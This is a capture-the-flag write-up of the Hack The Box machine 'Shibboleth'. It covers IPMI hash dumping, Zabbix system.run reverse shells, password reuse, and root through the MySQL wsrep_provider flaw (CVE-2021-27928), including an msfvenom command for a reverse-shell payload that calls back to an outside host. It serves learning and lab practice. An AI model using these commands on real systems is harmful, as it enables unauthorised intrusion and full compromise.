# SHIBBOLETH | 10.10.11.124

## Enumeration

    sudo nmap -v -T4 -sC -sV -oN nmap-initial 10.10.11.124

### Ports and Services

![nmap](img/nmap.png)

#### 80 - HTTP - Apache 2.4.41

A generic-looking web template for a fake company.

![homepage](img/port-80.png)

The only clue so far is what's at the very bottom of the page:

![powered by Zabbix](img/zabbix.png)

Running a gobuster scan for directories does not find anything useful, so I did a vhost scan with gobuster and found three hits:

![vhost scan](img/vhost.png)

All three subdomains take me to the Zabbix login page:

![Zabbix login page](img/login.png)

#### UDP 623 - ASF-RMCP

Now this is where my typical enumeration fell short. I do run UDP port scans on my targets, but only for the top 20 ports. This port is not one of them. So now I must resolve to increase the number of UDP ports to scan for every machine, just in case.

Googling the port for Linux brings us to [hacktricks](https://book.hacktricks.xyz/pentesting/623-udp-ipmi), which gives us all the info we need. Running through the list of enumeration techniques I find that it is using IPMI version 2 which is vulnerable to password hash retrieval. I tried the authentication bypass using `ipmitool` but it failed.

## Foothold

### Exploit Method

There is a Metasploit module available which is the most common way of doing it, but I also found a python tool [here](https://github.com/c0rnf13ld/ipmiPwner) and that worked for me:

![dumped Administrator hash](img/ipmihash.png)

This hash can be cracked in john using the rockyou wordlist (didn't work in hashcat):

![cracked password](img/password.png)

So now we have valid credentials to try on the Zabbix login page. And we are in.

![Zabbix Console](img/console.png)

There is a lot going on in this console. Digging through the documentation (and googling for 'Zabbix command execution'), I eventually find a potential way to execute commands on the system. 

    Configuration > Hosts > Items > Create item

I first try a simple command - `id` - so I can determine if this will work at all. Instead of adding the item, I click 'Test':

![adding an Item](img/system-run.png)

Another menu pops up and I can click to get the result of the command:

![Command execution](img/id.png)

Nice! Let's try a reverse shell.

![Bad fd number](img/badfd.png)

OK that didn't work right out of the box. I added `bash -c` in front of it and put the rest in quotes. I got a connect back! But it exited on its own after a couple of seconds:

![shell for a moment](img/almost.png)

![timeout](img/timeout.png)

That got me looking at the other parameter - nowait. By default it is 'wait', which waits for the script to finish. 'nowait' is supposed to return a 1 no matter the results of the script. So I will try adding 'nowait' to the end of the command:

![adding 'nowait' to the end of the system.run command](img/nowait.png)

And I have a shell that doesn't exit!

![shell as zabbix user](img/user-shell.png)

## Privilege Escalation - zabbix > ipmi-svc

The zabbix user does not have a login shell, and the only other user besides root who does is 'ipmi-svc' - which is the service we exploited previously, to get the hash. So I will most likely need to move laterally to get access to that account.

### Further Enumeration

There is a mysql server running on localhost:

![output of `ss -lntp`](img/ss-lntp.png)

OK, well I tried running `su - ipmi-svc`, using the password I already had and suddenly I was logged in as that user, so there's that:

![ipmi-svc shell](img/ipmi-shell.png)

## Privilege Escalation - ipmi-svc > root

Now that we are ipmi-svc, let's see how we can escalate our privileges to root.

### Further Enumeration

The user is not allowed to sudo on the box. Trying the password we have will not allow us access to the mysql database. I ran linpeas and it looks like it picked up some more credentials, located in the `/etc/zabbix/zabbix-server.conf` file:

![database creds found](img/mysql-creds.png)

I was able to get a look at the hashed passwords for the zabbix database, but the users in there are ones we already have compromised (besides a guest user with a blank password).

You can get stuck here, because usually with these HTB machines there is some kind of misconfiguration, or some kind of path to escalate. But I guess when you don't find anything, you shouldn't necessarily rely on the enumeration tools to find everything. At this point I need to look up the versions of Zabbix and mysql that are running on the box to see if there are any exploits for these specific versions. I have already exploited Zabbix another way and basically have full access to it, so let's look up the version of mysql that is running:

![MySQL version](img/mysql-version.png)

Googling that pretty quickly leads me to [here](https://github.com/Al1ex/CVE-2021-27928), which has a step by step of how to exploit this version. It doesn't really explain the vulnerability, but from [this link](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27928) it says that "an untrusted search path leads to eval injection... user can execute OS commands after modifying 'wsrep_provider'".

### Exploit method

According to that Github page I found, first thing I need to do is to create a shared object file (the Windows equivalent is a DLL I think):

    msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f elf-so -o pwn.so

Then I transfer it over to the target. After that I log back into the mysql server and run the following command:

    SET GLOBAL wsrep_provider="/dev/shm/pwn.so";

Then, I have a reverse shell as root:

![root shell](img/root-shell.png)

## Conclusion

Definitely a medium difficulty box. It has made me modify the enum script I use (just a wrapper around nmap) to check the top 100 UDP ports by default. Then I learned something new about the gobuster vhost enumeration, namely that I would not get results unless I appended `--append-domain` to the command. I had not heard of the IPMI protocol/service before but I imagine it is not in much use? After that, finding my way around Zabbix was frustrating yet rewarding - there always seem to be ways to execute commands on the host when you have admin access to a management interface. Escalating to root was an eye-opener in the sense that lately I have not had to look into the versions of common running software and see if they are exploitable. It is a useful reminder to look into that if there is no low-hanging fruit.

**Steps taken:**

* Grab hashes from IPMI 2.0 running on UDP port 623, crack hash
* Use password to access Zabbix console
* Use system.run to execute a reverse shell on the host
* Reuse password to move laterally
* Exploit vulnerable version of MySQL to get root shell
